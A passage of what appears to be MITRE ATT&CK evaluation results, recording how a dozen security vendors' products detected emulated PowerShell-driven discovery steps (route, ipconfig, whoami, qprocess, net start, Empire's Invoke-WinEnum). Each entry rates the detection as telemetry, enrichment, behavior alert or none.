Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed powershell.exe executing route.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Technique (T1049 - System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed powershell.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Enrichment (Tainted)
The capability enriched ipconfig.exe executing with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed ipconfig.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified ipconfig.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (ipconfig) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry
Telemetry showed ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability identified powershell.exe executing ipconfig.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing ipconfig.exe with command-line arguments and enriched the command with the condition Ipconfig All Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Enrichment
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery). [1] [2] [3] [4] [5]
Telemetry
Telemetry within the process tree showed powershell.exe executing whoami.exe with command-line arguments. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry
Telemetry showed whoami.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Enrichment (Tainted)
The capability enriched whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified whoami.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (whoami) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched powershell.exe executing whoami.exe indicating a sign of reconnaissance before privilege escalation. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing whoami.exe with command-line arguments and enriched the command with the condition Whoami Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched whomai.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Owner / User Discovery) and a suspicious indicator that the name of the logged user was discovered. [1] [2] [3] [4] [5] [6] [7]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by previous \"Suspicious sequence of exploration activities\" and suspicious PowerShell cmdlet alerts. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Technique (Process Discovery). [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed powershell.exe executing qprocess.exe with command-line arguments. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Telemetry
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
Cybereason
Enrichment (Tainted)
The capability enriched qprocess.exe executing as Reconnaissance and Local process discovery as well as the correct ATT&CK Technique (Process Discovery) and Tactic (Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4]
Telemetry
Telemetry showed qprocess.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments (tainted by parent PowerShell alerts). [1] [2] [3] [4]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified qprocess.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5]
Enrichment
The capability enriched qprocess.exe with an alert for Qprocess Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5]
F-Secure
Telemetry
Telemetry showed powershelll.exe executing qprocess.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
General Behavior
A General Behavior alert was generated showing that a spawned process (qprocess) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched qprocess.exe as listing running processes and possibly a sign of reconnaissance. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5]
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that software running on a system was queried. [1] [2] [3] [4] [5]
Enrichment
The capability enriched qprocess.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (Process Discovery) and a suspicious indicator that QPROCESS was used to check active processes. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by previous \"Suspicious sequence of exploration activities\" and suspicious PowerShell cmdlet alerts. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched qprocess.exe executing with a related ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Tainted)
The capability enriched the execution of qprocess.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
Telemetry
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Services Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that Windows services were manipulated via sc.exe/net.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior
A General Behavior alert was generated for net or sc command executed through PowerShell. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a previous suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as an enumeration command called by a commonly abused causality group owner (CGO, wscipt.exe). The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched net.exe executing as the execution of an enumeration command. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Telemetry
Telemetry showed process execution of powershell.exe. The powershell.exe process loaded several non-default dynamically loaded libraries that may indicate the functionality may be used by the PowerShell script. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a malicious command, which was identified as the Invoke-WinEnum function. The alert also identified the PowerShell commands as suspicious and were tagged with the correct ATT&CK Technique (PowerShell) and Tactic (Execution). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed the PowerShell Script module (.psm1) being written to the temp folder. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of the PowerShell Process (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for "PowerShell with Unusual Arguments" that coincided with the execution of WinEnum (tainted by parent PowerShell alerts). The alert also identified a related ATT&CK Technique (T1086 - PowerShell) and Tactic (Execution). From the alert, the Interactive Shell was used to analyze the PowerShell script and the function Invoke-WinEnum was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that a PowerShell command was run from the Empire process. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched powershell.exe with an alert for PowerShell Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1086 - PowerShell). [1] [2] [3] [4] [5] [6] [7]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function. [1] [2] [3] [4] [5]
GoSecure
Telemetry
Telemetry showed powershell.exe connecting to the domain controller 10.0.0.4 (Creeper), which coincided with the execution of WinEnum. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder, indicating the execution of a PowerShell script. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence from PowerShell with several activities from the WinEnum cmdlet. The telemetry was tainted by the previous \"Suspicious sequence of exploration activities\" alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior
A Specific Behavior alert was generated for "A malicious PowerShell Cmdlet was invoked on the machine." [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire WinEnum. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
RSA
Telemetry
Telemetry showed PowerShell running and a PowerShell script being written to disk that coincided with the execution of WinEnum. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of a PowerShell script with follow-on enumeration activity that coincided with the execution of the WinEnum module. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Get-UserInfo was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of user information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire UserInfo. [1] [2] [3] [4] [5] [6]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum AD Group Memberships was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
None
No detection capability demonstrated for this procedure, though telemetry showed loading of an assembly associated with accessing Active Directory security principals. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of AD group memberships. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
None
No detection capability demonstrated for this procedure, though telemetry showed powershell.exe connecting to the domain controller. This could indicate AD group information was being obtained, but this was not directly detected. The vendor indicated the capability sees the start of a PowerShell connection, but would not see additional commands after that start. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
None
No detection capability demonstrated for this procedure.
Cybereason
None
No detection capability demonstrated for this procedure.
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Password Last changed was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of password policy information. [1]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details.
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
None
No detection capability demonstrated for this procedure.
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Last 5 files opened was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of recently opened files. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though the Interactive Shell was used to analyze the PowerShell execution and WinEnum Interesting Files was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. [1] [2] [3] [4]
FireEye
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
